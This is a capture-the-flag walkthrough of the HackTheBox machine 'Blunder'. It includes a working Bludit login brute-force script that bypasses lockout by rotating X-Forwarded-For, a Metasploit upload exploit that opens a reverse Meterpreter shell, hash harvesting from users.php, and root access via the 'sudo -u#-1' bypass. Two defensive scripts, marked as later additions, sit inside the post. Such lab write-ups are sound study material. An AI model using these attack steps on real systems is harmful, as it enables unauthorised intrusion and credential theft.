Hackthebox – Blunder

As with any machine, Blunder also gets several port scans first.

root@kalivm:~/Blunder# nmap -A -oN fullscan-A 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 11:19 CEST 
Nmap scan report for 10.10.10.191 (10.10.10.191)
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   13.09 ms 10.10.14.1 (10.10.14.1)
2   13.10 ms 10.10.10.191 (10.10.10.191)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.98 seconds

Only port 80 is open, so time to check out what’s on there.

[Screenshot: Bludit main page on Blunder]
A first visit showed this blog with some articles about various topics. Nothing too interesting yet, so I kept looking.
[Screenshot: Bludit login page on Blunder]
One thing I noticed was that just adding /admin to the URL showed this login page, which could be interesting as well.

root@kalivm:~/Blunder# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://10.10.10.191/ -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.191/
[+] Threads:        40
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/01 11:25:16 Starting gobuster
===============================================================
/install.php (Status: 200)
/.htaccess (Status: 403)
/robots.txt (Status: 200)
/.html (Status: 403)
/.php (Status: 403)
/.htpasswd (Status: 403)
/.htm (Status: 403)
/.htpasswds (Status: 403)
/.gitignore (Status: 200)
/.htgroup (Status: 403)
/wp-forum.phps (Status: 403)
/.htaccess.bak (Status: 403)
/.htuser (Status: 403)
/.ht (Status: 403)
/.htc (Status: 403)
/todo.txt (Status: 200)
===============================================================
2020/06/01 11:29:42 Finished
===============================================================

Some files are accessible, which makes it clear why this box is called Blunder. Besides the install.php and .gitignore files, which did not contain much of interest, there are a robots.txt and a todo.txt, so let’s check those out to see if there is anything interesting in them.

root@kalivm:~/Blunder# curl http://10.10.10.191/robots.txt
User-agent: *
Allow: /
root@kalivm:~/Blunder# curl http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

Apparently fergus needs to be told some things. This might be useful as a username, so keep it in mind. After some further searching nothing of particular interest was found, so I decided to create a wordlist from the blog’s contents and see if I could use that to log in. Since I noticed the CSRF token in the login screen, I did some brief research on how to brute force with CSRF tokens and found several blogs writing about it, including this blog about bypassing the brute-force protection on Bludit. After a small alteration of the script on that website, I let it take the password list as an argument, connect to the Blunder box, and set the username to fergus.

#!/usr/bin/env python3
import re
import requests
import sys

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

# Read the candidate passwords from the file given as the first argument
with open(sys.argv[1], "r") as f:
    for line in f:
        wordlist.append(line.strip())

# Left over from the original script: its default password is tried last
wordlist.append('adminadmin')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # Each attempt needs the fresh CSRF token from the login form
    match = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text)
    if match is None:
        print('[!] No CSRF token found on the login page, stopping')
        break
    csrf_token = match.group(1)

    print('[*] Trying: {p}'.format(p = password))

    # The X-Forwarded-For value differs on every request; this is the
    # brute-force protection bypass described in the linked blog post
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login redirects to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

I ran it against the CMS with the wordlist I had created from the blog.

root@kalivm:~/Blunder# python3 bludit_brute.py blunder.txt
[*] Trying: the
[*] Trying: Load
[*] Trying: Plugins
---snip---
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: best
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
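As an added defender-side counterpart to the script above (not part of the original post), the following spots this kind of brute forcing in web-server logs: one real client posting to the login page while the X-Forwarded-For header changes on nearly every request, or carries values that are not IP addresses at all. It assumes Apache's combined log format with the X-Forwarded-For header appended as one extra quoted field, and the log lines it runs over are constructed.

```python
# Flag Bludit login brute forcing that rotates X-Forwarded-For (added example).
# Assumed log format, constructed here: Apache 'combined' plus one trailing
# quoted field carrying %{X-Forwarded-For}i.
import ipaddress
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$')


def is_ip(value):
    """True if the header holds a real address, as a genuine proxy would send."""
    try:
        return bool(ipaddress.ip_address(value.strip()))
    except ValueError:
        return False


def summarize(log_text):
    """Per real client IP: login POST count, distinct XFF values, non-IP XFF count."""
    stats = defaultdict(lambda: {"attempts": 0, "xff": set(), "bogus": 0})
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        if m["method"] != "POST" or m["path"] != "/admin/login":
            continue
        s = stats[m["ip"]]
        s["attempts"] += 1
        s["xff"].add(m["xff"])
        s["bogus"] += 0 if is_ip(m["xff"]) else 1
    return stats


def suspicious_clients(log_text, min_attempts=5):
    """Clients whose login POSTs change XFF on most requests or send non-IP XFF."""
    return sorted(ip for ip, s in summarize(log_text).items()
                  if s["attempts"] >= min_attempts
                  and (s["bogus"] or len(s["xff"]) / s["attempts"] > 0.5))


def log_line(ip, sec, xff):
    return (f'{ip} - - [01/Jun/2020:11:40:{sec:02d} +0200] "POST /admin/login HTTP/1.1" '
            f'200 4100 "http://10.10.10.191/admin/login" "Mozilla/5.0" "{xff}"')


# Constructed sample: 10.10.14.8 posts six times with a fresh non-IP XFF each time
# (the script above puts each password candidate there); 192.0.2.5 is one user
# behind a single proxy who mistyped a password once.
WORDS = ["the", "Load", "Plugins", "best", "fictional", "RolandDeschain"]
SAMPLE_LOG = "\n".join([log_line("10.10.14.8", i, w) for i, w in enumerate(WORDS)]
                       + [log_line("192.0.2.5", 30 + i, "198.51.100.7") for i in range(2)])

if __name__ == "__main__":
    print("flagged:", suspicious_clients(SAMPLE_LOG))
```

The ratio test also catches an attacker who rotates through valid-looking addresses, and the threshold keeps a single user behind one proxy from being flagged.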

[Screenshot: logged in to Bludit on Blunder]
Fergus’ password is RolandDeschain, and after a quick verification I saw that I was able to log in. I had also already found that there was a Metasploit exploit for Bludit which, given valid credentials, allowed remote code execution, so I fired up Metasploit.

root@kalivm:~/Blunder# msfconsole
msf5 > search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability

msf5 > use 0
msf5 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2

So I selected this module and checked which options needed to be set: the Bludit credentials and the target host.

msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.8:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading zaCrNlNPAp.png...
[*] Uploading .htaccess...
[*] Executing zaCrNlNPAp.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.191:45660) at 2020-06-01 13:31:58 +0200
[+] Deleted .htaccess
meterpreter > shell
Process 6056 created.
Channel 0 created.
whoami
www-data

After upgrading to a proper shell with python, I was able to browse the filesystem and look for a way to gain access to a normal user. I had already noticed home directories for the users Hugo and Shaun in /home. After browsing through the various www directories, I found some interesting entries by grepping for passwords:

www-data@blunder:~$ grep -ri '"password":' ./
grep -ri '"password":' ./
./bludit-3.10.0a/bl-plugins/bl-languages/ja_JP.json:    "password": "パスワード",
./bludit-3.10.0a/bl-content/databases/users.php:        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", 
---snip---
./bludit-3.9.2/bl-content/databases/users.php:        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
./bludit-3.9.2/bl-content/databases/users.php:        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
---snip---

These looked like SHA1 hashes and, given the way Bludit works, may very well be passwords that can be cracked.
[Screenshot: cracked hashes for Blunder]
After throwing them into crackstation, it appeared that only one of them could be cracked, so I decided to take a look at the bludit-3.10.0a users.php file.

www-data@blunder:~$ cat bludit-3.10.0a/bl-content/databases/users.php
cat bludit-3.10.0a/bl-content/databases/users.php

{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

So this was Hugo’s password. From the other two hashes it became apparent that they were salted, which explains why crackstation could not crack them. Perhaps I can now use this password to become Hugo on the shell I got.
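To make the salted versus unsalted difference concrete, here is an added example (not Bludit's own code) that loads a users.php-style file, verifies candidates the way the CMS login does, lists accounts stored without a salt, and re-hashes such an account under a fresh salt. It assumes Bludit 3.x computes sha1 over the password followed by the salt; the sample file and fergus's salt are constructed, and the passwords are the two found on this box.

```python
# Audit a Bludit users.php for unsalted password hashes (added example, not
# Bludit's code). Assumes Bludit 3.x stores sha1(password + salt) in "password"
# with the salt in "salt"; an empty salt means a bare sha1 lookup tables resolve.
import hashlib
import json
import re
import secrets

PHP_GUARD = re.compile(r"^\s*<\?php.*?\?>\s*", re.DOTALL)

def bludit_hash(password, salt=""):
    """Assumed Bludit 3.x scheme: sha1 over the password followed by the salt."""
    return hashlib.sha1((password + salt).encode()).hexdigest()

def load_users(text):
    """Parse users.php: drop a leading PHP guard line if present, then read the JSON."""
    return json.loads(PHP_GUARD.sub("", text, count=1))

def unsalted_users(users):
    """Accounts whose stored hash has no salt, i.e. crackable by plain sha1 lookup."""
    return sorted(name for name, u in users.items() if not u.get("salt"))

def verify(users, name, password):
    """Check a candidate the way the CMS login would, honouring the user's salt."""
    u = users.get(name)
    return bool(u) and bludit_hash(password, u.get("salt", "")) == u["password"]

def rehash_user(user, password):
    """Corrected setting: store the same password under a fresh random salt."""
    salt = secrets.token_hex(8)
    return {**user, "salt": salt, "password": bludit_hash(password, salt)}

def build_sample():
    """Constructed users.php text in the shape listed above: Hugo's entry has no
    salt, fergus's has a constructed one; passwords are the two found on this box."""
    users = {
        "admin": {"nickname": "Hugo", "salt": "",
                  "password": bludit_hash("Password120")},
        "fergus": {"nickname": "fergus", "salt": "a1b2c3d4e5f6a7b8",
                   "password": bludit_hash("RolandDeschain", "a1b2c3d4e5f6a7b8")},
    }
    return "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps(users, indent=4)

if __name__ == "__main__":
    users = load_users(build_sample())
    print("unsalted accounts:", unsalted_users(users))
    for name, pw in (("admin", "Password120"), ("fergus", "RolandDeschain")):
        print(name, "verifies:", verify(users, name, pw))
```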

www-data@blunder:~$ su - hugo
su - hugo
Password: Password120

hugo@blunder:~$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)

And that worked: now I’m hugo, and I had already found during recon that user.txt is in his home directory, so all I need to do is read that flag!

hugo@blunder:~$ cat user.txt
cat user.txt
2b612e<NOFLAG>fc8de85cf9373ac54b

And there is the user flag!

Privilege Escalation

After obtaining the user flag, privilege escalation was done quite quickly on this box.

hugo@blunder:~$ sudo -l
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

One thing I was not yet aware of: after some playing around on the box I asked for a nudge on Discord, and I was pointed to the fact that this sudo configuration has a known exploit on ExploitDB. After that, the flag was only one query and two commands away.

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat root.txt
9d606f8<NOFLAG>ad9a0d4e9584648fa

And now I’ve got the root flag too.
